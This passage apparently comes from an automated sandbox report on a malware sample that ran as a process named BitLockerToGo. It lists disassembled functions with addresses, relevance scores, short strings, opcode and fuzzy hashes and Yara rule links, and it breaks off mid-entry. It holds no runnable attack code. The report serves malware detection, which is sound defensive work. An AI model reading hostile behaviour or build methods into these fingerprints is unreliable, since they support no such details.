                                                                                                                                                          • Instruction ID: fa010391967b301aa64a0dc60cb5df617edfad0297d8a6c6fe60ece4a3747872
                                                                                                                                                          • Opcode Fuzzy Hash: 7b65f3be6fd35c8e80eb7173b7b53a6dd50b925ad49a31363b71411c5f62ed77
                                                                                                                                                          • Instruction Fuzzy Hash: 03615B3761959297C7104E3C9C422A9AA530B9B334F3ED377D8B18B3D1C66E4C0A9356
                                                                                                                                                          Function 00440CC0 Relevance: 2.7, Strings: 2, Instructions: 206COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0$T
                                                                                                                                                          • API String ID: 0-1187268809
                                                                                                                                                          • Opcode ID: d184b7ad746bfd29d2089b56f9ae5095a2bb1cac60152be077c7504b51e14a1b
                                                                                                                                                          • Instruction ID: 6b4e5559f047ebe892616e64a95d5d31df2fd22d4af3a3957066fdf53f8f1aff
                                                                                                                                                          • Opcode Fuzzy Hash: d184b7ad746bfd29d2089b56f9ae5095a2bb1cac60152be077c7504b51e14a1b
                                                                                                                                                          • Instruction Fuzzy Hash: 74719FB16043009FE718CF14C851B6BFBE1EF85314F24882DEA958B351C779E855CB96
                                                                                                                                                          Function 0041EE2E Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($D
                                                                                                                                                          • API String ID: 0-2900777419
                                                                                                                                                          • Opcode ID: 269a632ffe76f496ff796a3ed179a9758fc2955de7d4d28485244eb6707e22f2
                                                                                                                                                          • Instruction ID: 7d4d99b430d3557b421910b4f1faef55ee4365ca1ce7d7efc57e0254bf4380e2
                                                                                                                                                          • Opcode Fuzzy Hash: 269a632ffe76f496ff796a3ed179a9758fc2955de7d4d28485244eb6707e22f2
                                                                                                                                                          • Instruction Fuzzy Hash: 7361F6B4108300DFD718CF14D895B6BB7A1FF85759F10592DE4821B2A3D37ADA4ACB8A
                                                                                                                                                          Function 004463E0 Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: /.-,$@
                                                                                                                                                          • API String ID: 2994545307-3723685748
                                                                                                                                                          • Opcode ID: db665a82bba1296d39a868ee5f520c1422103deeff47c98896bc777b14cb1610
                                                                                                                                                          • Instruction ID: fcae81e8805a0631e12ceff5e77ca36e2fde201330cec111e8e81ca44fce2a30
                                                                                                                                                          • Opcode Fuzzy Hash: db665a82bba1296d39a868ee5f520c1422103deeff47c98896bc777b14cb1610
                                                                                                                                                          • Instruction Fuzzy Hash: D54149709043109BEB04CF18E88566BB7F0FF95728F11862DE599573A5E7399A04CB8B
                                                                                                                                                          Function 00404E60 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %1.17g
                                                                                                                                                          • API String ID: 0-1551345525
                                                                                                                                                          • Opcode ID: c1da595488c2fa9b36147d3a0c3c686ea93c5f2225409572b266d64f1e683121
                                                                                                                                                          • Instruction ID: 8cedfe368efb2444d6467586d7d48e8a1f5c8dd3b15ce253f9faee3126b86410
                                                                                                                                                          • Opcode Fuzzy Hash: c1da595488c2fa9b36147d3a0c3c686ea93c5f2225409572b266d64f1e683121
                                                                                                                                                          • Instruction Fuzzy Hash: 6112C475A08B418BD7158E14948032BBB92EFE1308F18857ED895AB3C1E7B9DC45CF4A
                                                                                                                                                          Function 00427350 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoCreateInstance.OLE32(00449B90,00000000,00000001,00449B80), ref: 00427379
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                          • Opcode ID: 520afe2f893935785e5c665e40ede723d4ec9078aaab423c0093ae211694db98
                                                                                                                                                          • Instruction ID: 08bc5e63f182cba07979323364d8c3633ea9ecc8f17316bb81642fd87fb76cd1
                                                                                                                                                          • Opcode Fuzzy Hash: 520afe2f893935785e5c665e40ede723d4ec9078aaab423c0093ae211694db98
                                                                                                                                                          • Instruction Fuzzy Hash: 7B51DFB0708220ABDB20AB24DC96B7777A4EF81758F448559F985CB391F378E841C76A
                                                                                                                                                          Function 0042F900 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "
                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                          • Opcode ID: d568b379d4c6fa6f77ff1eae736f1047f5612009a18c4700c5e623800c826368
                                                                                                                                                          • Instruction ID: a3c58f450455d4d1eb0a87c26812bbd6c04f9869e4a084bcfb263ebe4809eb3b
                                                                                                                                                          • Opcode Fuzzy Hash: d568b379d4c6fa6f77ff1eae736f1047f5612009a18c4700c5e623800c826368
                                                                                                                                                          • Instruction Fuzzy Hash: B4D125B2B082256BC724CE25D490B6BB7F5AB84354FC8853EE88687391D73CDC49C786
                                                                                                                                                          Function 0042B500 Relevance: 1.6, Strings: 1, Instructions: 352COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: %*+(
                                                                                                                                                          • API String ID: 2994545307-3233224373
                                                                                                                                                          • Opcode ID: 980dc8a21c4e044f79a4081f9898d7856cb0dea31180dea976573b739579e97f
                                                                                                                                                          • Instruction ID: 7ea25cf2304ee25f65172b355e02d3d3047475b1fd223099b041827ac72acce6
                                                                                                                                                          • Opcode Fuzzy Hash: 980dc8a21c4e044f79a4081f9898d7856cb0dea31180dea976573b739579e97f
                                                                                                                                                          • Instruction Fuzzy Hash: 79A14770B083258BD7109F25E88073BB3E5EF81354F58892EE9859B382E738D945C7DA
                                                                                                                                                          Function 0041E670 Relevance: 1.6, Strings: 1, Instructions: 349COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+(
                                                                                                                                                          • API String ID: 0-3233224373
                                                                                                                                                          • Opcode ID: a8918c15477656cc8daef73c3f3a0404579f49981537884bf10d2b6879b085a5
                                                                                                                                                          • Instruction ID: 76caae30cb6fa77cf2d0480afc4a32d482555d34d08f731cb62b09a057576ba4
                                                                                                                                                          • Opcode Fuzzy Hash: a8918c15477656cc8daef73c3f3a0404579f49981537884bf10d2b6879b085a5
                                                                                                                                                          • Instruction Fuzzy Hash: 4B8145BA904200DBD724AF15DC92AB773B0FF82354F09492EEC864B391E338D941C79A
                                                                                                                                                          Function 00446F00 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: /.-,
                                                                                                                                                          • API String ID: 2994545307-4180950418
                                                                                                                                                          • Opcode ID: e0f9e11d950cb37439ae44eec80e902b558a79d1b5258e11c1d8b142b8ac354a
                                                                                                                                                          • Instruction ID: 9ad1a62d6abdb815f9c8a9556e3d48383c3ceba71e43ac5ff45538b70e224522
                                                                                                                                                          • Opcode Fuzzy Hash: e0f9e11d950cb37439ae44eec80e902b558a79d1b5258e11c1d8b142b8ac354a
                                                                                                                                                          • Instruction Fuzzy Hash: C591C1316083118BD724CF18C88062FB7F2AF89750F19C92DEA95973A5EB35DC51C786
                                                                                                                                                          Function 00446C30 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: /.-,
                                                                                                                                                          • API String ID: 2994545307-4180950418
                                                                                                                                                          • Opcode ID: 9591eb5e6f014507b6f77b7a37df3fb3db69a202356dd150857bd90b711e29c7
                                                                                                                                                          • Instruction ID: de809bb00f17f1e2c54f3df1d747ec6d57064335e84f41b1c3609222a8b362ac
                                                                                                                                                          • Opcode Fuzzy Hash: 9591eb5e6f014507b6f77b7a37df3fb3db69a202356dd150857bd90b711e29c7
                                                                                                                                                          • Instruction Fuzzy Hash: 4E81B1346043019BE714DF18C880A6BB7F2FF9A750F16852DE5848B365DB35DC51CB46
                                                                                                                                                          Function 0040A5A0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,
                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                          • Opcode ID: 87d5ed803c5b733315ab01095841bef12b7b20767e0dc7307d38f9d7e17edac2
                                                                                                                                                          • Instruction ID: eefe6184203060666edbc0889af857083423912bff3620e99674589105f4da06
                                                                                                                                                          • Opcode Fuzzy Hash: 87d5ed803c5b733315ab01095841bef12b7b20767e0dc7307d38f9d7e17edac2
                                                                                                                                                          • Instruction Fuzzy Hash: BBB139711093819FD321CF18C88061BFBE0AFA9704F488E2DE5D997382D635E919CBA7
                                                                                                                                                          Function 00416982 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \fs>
                                                                                                                                                          • API String ID: 0-699854602
                                                                                                                                                          • Opcode ID: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
                                                                                                                                                          • Instruction ID: e026fd50d870f59186aba3a3de6d5e93a37883884e6e3bcbc309e70d0183b647
                                                                                                                                                          • Opcode Fuzzy Hash: 337138f4e4215cbfc7eaa64eca64cc6b5bb028d374e3f888f3c7000cdf7cea28
                                                                                                                                                          • Instruction Fuzzy Hash: 1DB1F575519B808BC3228B38C9853E7BFE5AB56314F498D6EC8EFC7386D638A505C706
                                                                                                                                                          Function 0040ED40 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: EONQ
                                                                                                                                                          • API String ID: 0-2229190151
                                                                                                                                                          • Opcode ID: bfb22d384f13b7f54fd5d87b2983e82eb7c3fadec93facaf8624bbd5ac152fb2
                                                                                                                                                          • Instruction ID: a76a7a6bcaff0e592dbad9cc17801034314641e3190079893e41afc2bf5bcae7
                                                                                                                                                          • Opcode Fuzzy Hash: bfb22d384f13b7f54fd5d87b2983e82eb7c3fadec93facaf8624bbd5ac152fb2
                                                                                                                                                          • Instruction Fuzzy Hash: 54510732F412684BDB54CA79CCD23DFA7E2DB89320F1945B9C888E7381D9784D968B48
                                                                                                                                                          Function 00445E70 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: wW{
                                                                                                                                                          • API String ID: 0-3806686672
                                                                                                                                                          • Opcode ID: 62e6a419984f77f8fb23d3cea7b1386d9893fc736c7f0a2ad1c8c1a37104dab2
                                                                                                                                                          • Instruction ID: 7d12f8f514b71fb150ffa098ca01bcbd8d22198edcd9d55694019e078bf13a18
                                                                                                                                                          • Opcode Fuzzy Hash: 62e6a419984f77f8fb23d3cea7b1386d9893fc736c7f0a2ad1c8c1a37104dab2
                                                                                                                                                          • Instruction Fuzzy Hash: B2412034299301CFD7058F38E89026BB7E1EB8A316F598C7DE086C3362D63AD846CB15
                                                                                                                                                          Function 004150C0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: +
                                                                                                                                                          • API String ID: 0-2126386893
                                                                                                                                                          • Opcode ID: a794292c5b2f766263ce056902814cd33f0a334f0ed32c26101f63c381c01e53
                                                                                                                                                          • Instruction ID: 67e8d549206588d00c05d0851586c540a1f2f819fe23713ce51036cfcb4ce85b
                                                                                                                                                          • Opcode Fuzzy Hash: a794292c5b2f766263ce056902814cd33f0a334f0ed32c26101f63c381c01e53
                                                                                                                                                          • Instruction Fuzzy Hash: B3414375609B41CFD328CF38D5D93A7BBE2AB89304F18886EC59B87385D739A845CB05
                                                                                                                                                          Function 00410772 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 47
                                                                                                                                                          • API String ID: 0-1112425479
                                                                                                                                                          • Opcode ID: 08839e348e23fcb360676f012b37867764b0dd2162ddaa416d4c4b5948d1cdf3
                                                                                                                                                          • Instruction ID: c7510ebe19e2b473552174996d94a7c1ca77af5c1a7778dc99f7db51acd90bb6
                                                                                                                                                          • Opcode Fuzzy Hash: 08839e348e23fcb360676f012b37867764b0dd2162ddaa416d4c4b5948d1cdf3
                                                                                                                                                          • Instruction Fuzzy Hash: 79218B7400D3018AD304DF21C95166BBBF2EFD2319F04A91DF0D64B661E7B8C989CB8A
                                                                                                                                                          Function 0042CC28 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+(
                                                                                                                                                          • API String ID: 0-3233224373
                                                                                                                                                          • Opcode ID: fc8af48a4930ed1354326aebcf23a7e696fd3f78917aa8bb71f4a1efd1b347df
                                                                                                                                                          • Instruction ID: 53b8857e794f18ab87cd019d7de2b91d2dd55080db35ea1d131349e5b6579fe0
                                                                                                                                                          • Opcode Fuzzy Hash: fc8af48a4930ed1354326aebcf23a7e696fd3f78917aa8bb71f4a1efd1b347df
                                                                                                                                                          • Instruction Fuzzy Hash: BA2127307083509BDB2C8F14B98067FB3A2BF95B55F60051ED0821369BD739CA16CB9E
                                                                                                                                                          Function 0042E049 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+(
                                                                                                                                                          • API String ID: 0-3233224373
                                                                                                                                                          • Opcode ID: 9af70b8f6cbc3c70dca74eb00381e3fcef9bf5563063a9e76a2bd2a41558f2db
                                                                                                                                                          • Instruction ID: 8237016886215cc8278a7af7c6f8f6b276ffff4dcf6ff5f6429baec8ab3bc397
                                                                                                                                                          • Opcode Fuzzy Hash: 9af70b8f6cbc3c70dca74eb00381e3fcef9bf5563063a9e76a2bd2a41558f2db
                                                                                                                                                          • Instruction Fuzzy Hash: DC018034609310DBD7148F12E890A3BB3B2EF86745F50AD2CD9851B256D375DD46C71A
                                                                                                                                                          Function 004430D0 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: M-L
                                                                                                                                                          • API String ID: 0-3628306645
                                                                                                                                                          • Opcode ID: c70052da55240df270b89936481df9dfe3845e990ec9a0c4650baec86b6953da
                                                                                                                                                          • Instruction ID: d2ff77c061e2f7469c72e79564278c2da2bc67103c34b87218cd4374b0ebfb62
                                                                                                                                                          • Opcode Fuzzy Hash: c70052da55240df270b89936481df9dfe3845e990ec9a0c4650baec86b6953da
                                                                                                                                                          • Instruction Fuzzy Hash: E2D05B65A10244379554A52ADD5BE377D7D8743595F402124FC41E7395D810DC1543EA
                                                                                                                                                          Function 004108A8 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: [vSO
                                                                                                                                                          • API String ID: 0-448860619
                                                                                                                                                          • Opcode ID: e407b34540df400001dc5778b816732a2f9fc3c95ec119a49a36422e6199eb32
                                                                                                                                                          • Instruction ID: 5502fc275d410e11b81581b741b8fd9ce7e832fe9ff15ac3c708498acf514ec9
                                                                                                                                                          • Opcode Fuzzy Hash: e407b34540df400001dc5778b816732a2f9fc3c95ec119a49a36422e6199eb32
                                                                                                                                                          • Instruction Fuzzy Hash: E0B01238D4D18097D6888F6CA9B3170A7B8465710CB1C70BC894FE7243C402D053890D
                                                                                                                                                          Function 00408D70 Relevance: .9, Instructions: 854COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fcd0caf7217d82e4a67e3b3e0821b4e622572f50fa36d9bbac569e803d401924
                                                                                                                                                          • Instruction ID: 71cf5c1052c8130a8135322bbec6f239fe5f04d2c4df255d0d7e4d20efe2fbfd
                                                                                                                                                          • Opcode Fuzzy Hash: fcd0caf7217d82e4a67e3b3e0821b4e622572f50fa36d9bbac569e803d401924
                                                                                                                                                          • Instruction Fuzzy Hash: DF728639608201DFD718CF28D850B5ABBE1FF89318F09896DE88997392D735E945CF86
                                                                                                                                                          Function 0040BC00 Relevance: .8, Instructions: 830COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0df3d7ddef05106c11decd191feb34a5cd50d5d3f9db0a327a6f6a32b69de205
                                                                                                                                                          • Instruction ID: d2bf7d9b428437aae4a1d42f72b5b3351cf51a3c38eeb5342afe5db5ac70e12c
                                                                                                                                                          • Opcode Fuzzy Hash: 0df3d7ddef05106c11decd191feb34a5cd50d5d3f9db0a327a6f6a32b69de205
                                                                                                                                                          • Instruction Fuzzy Hash: FC52A031518311CBC725DF18D88066BB3E2FFD4314F298A3ED996A7385D739A851CB8A
                                                                                                                                                          Function 0040B0F0 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dd983f33b4e53cc41b0625498ae397007b757580e0d90f84fdf3e6cd2a69271c
                                                                                                                                                          • Instruction ID: b3d9d8369882f20298f4cce596b901f104cae4ccaa4802953af06847f76dd183
                                                                                                                                                          • Opcode Fuzzy Hash: dd983f33b4e53cc41b0625498ae397007b757580e0d90f84fdf3e6cd2a69271c
                                                                                                                                                          • Instruction Fuzzy Hash: 565280B0908B889FE7358B24C4847A7BBE1EB91314F14487EC5E616BC2D37DA885C79D
                                                                                                                                                          Function 00406ED0 Relevance: .7, Instructions: 657COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d6f1f0a554b5f4ea1dff79201fa12c76aa8ddbc04dcc0ebd949a31b7ea78ddaf
                                                                                                                                                          • Instruction ID: 58062010d57dbfcf5283a5e538c47d199c2c186e37e03e7f4490e03e071f3543
                                                                                                                                                          • Opcode Fuzzy Hash: d6f1f0a554b5f4ea1dff79201fa12c76aa8ddbc04dcc0ebd949a31b7ea78ddaf
                                                                                                                                                          • Instruction Fuzzy Hash: FE52D43190C3458FCB15CF14C0906AABBE1BF89314F198A7EF89967391D778E849CB86
                                                                                                                                                          Function 004078D0 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 08078922fef9d2dd9f8c34a560dda256bf7c6e3e6e8f9534e1619a80317fc06a
                                                                                                                                                          • Instruction ID: ef98cb59dfc2af0607c20476c88b3e4c798bc7196589333f048f68ca00177eaf
                                                                                                                                                          • Opcode Fuzzy Hash: 08078922fef9d2dd9f8c34a560dda256bf7c6e3e6e8f9534e1619a80317fc06a
                                                                                                                                                          • Instruction Fuzzy Hash: 30324670A19B118FC368CF29C69052AB7F1BF85700B604A2ED69797F90D73AF845CB19
                                                                                                                                                          Function 004275B0 Relevance: .5, Instructions: 477COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1bb2d12d55d91590ae2f05de939e756a01c1a7b285e88c322bc998e669b99299
